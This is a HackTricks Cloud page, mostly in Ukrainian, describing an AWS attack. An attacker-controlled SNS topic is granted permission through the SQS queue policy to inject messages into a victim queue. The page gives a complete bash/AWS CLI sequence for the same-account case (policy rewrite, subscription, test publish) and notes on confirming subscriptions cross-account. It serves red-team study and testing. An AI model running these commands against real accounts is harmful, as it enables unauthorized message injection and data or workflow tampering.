AWS – SQS Cross-/Same-Account Injection via SNS Subscription + Queue Policy

Reading time: 4 minutes

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.

Опис

Зловживання політикою ресурсу SQS черги для дозволу attacker-controlled SNS topic публікувати повідомлення в SQS чергу жертви. В межах того ж акаунту підписка SQS на SNS topic підтверджується автоматично; у cross-account випадку потрібно прочитати токен SubscriptionConfirmation з черги та викликати ConfirmSubscription. Це дозволяє здійснювати ненадійну ін’єкцію повідомлень, яким нижчі споживачі можуть автоматично довіряти.

Вимоги

Можливість змінювати політику ресурсу цільової SQS черги: sqs:SetQueueAttributes на черзі жертви.
Можливість створювати/публікувати в SNS topic під контролем атакуючої сторони: sns:CreateTopic, sns:Publish, та sns:Subscribe в акаунті/топіку атакуючого.
Тільки для cross-account: тимчасове sqs:ReceiveMessage на черзі жертви, щоб прочитати токен SubscriptionConfirmation і викликати sns:ConfirmSubscription.

Експлуатація в тому ж акаунті

bash

REGION=us-east-1
# 1) Create victim queue and capture URL/ARN
Q_URL=$(aws sqs create-queue --queue-name ht-victim-q --region $REGION --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# 2) Create attacker SNS topic
TOPIC_ARN=$(aws sns create-topic --name ht-attacker-topic --region $REGION --query TopicArn --output text)

# 3) Allow that SNS topic to publish to the queue (queue resource policy)
cat > /tmp/ht-sqs-sns-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowSNSTopicPublish","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"SQS:SendMessage","Resource":"REPLACE_QUEUE_ARN","Condition":{"StringEquals":{"aws:SourceArn":"REPLACE_TOPIC_ARN"}}}]}
JSON
sed -i.bak "s#REPLACE_QUEUE_ARN#$Q_ARN#g; s#REPLACE_TOPIC_ARN#$TOPIC_ARN#g" /tmp/ht-sqs-sns-policy.json
# Provide the attribute as a JSON map so quoting works reliably
cat > /tmp/ht-attrs.json <<JSON
{
"Policy": "REPLACE_POLICY_JSON"
}
JSON
# Embed the policy file contents as a JSON string
POL_ESC=$(jq -Rs . /tmp/ht-sqs-sns-policy.json)
sed -i.bak "s#\"REPLACE_POLICY_JSON\"#$POL_ESC#g" /tmp/ht-attrs.json
aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes file:///tmp/ht-attrs.json

# 4) Subscribe the queue to the topic (auto-confirms same-account)
aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --region $REGION

# 5) Publish and verify injection
aws sns publish --topic-arn "$TOPIC_ARN" --message {pwn:sns->sqs} --region $REGION
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --attribute-names All --message-attribute-names All

Примітки щодо доступу між акаунтами

Політика черги вище має дозволяти сторонній TOPIC_ARN (обліковий запис атакуючого).
Підписки не підтверджуються автоматично. Надайте собі тимчасовий sqs:ReceiveMessage на цільовій черзі, щоб прочитати повідомлення SubscriptionConfirmation, а потім викличте sns confirm-subscription з його Token.

Вплив

Потенційний вплив: постійна інжекція непроханих повідомлень у довірену SQS-чергу через SNS, що може спричинити небажану обробку, забруднення даних або зловживання робочими процесами.

tip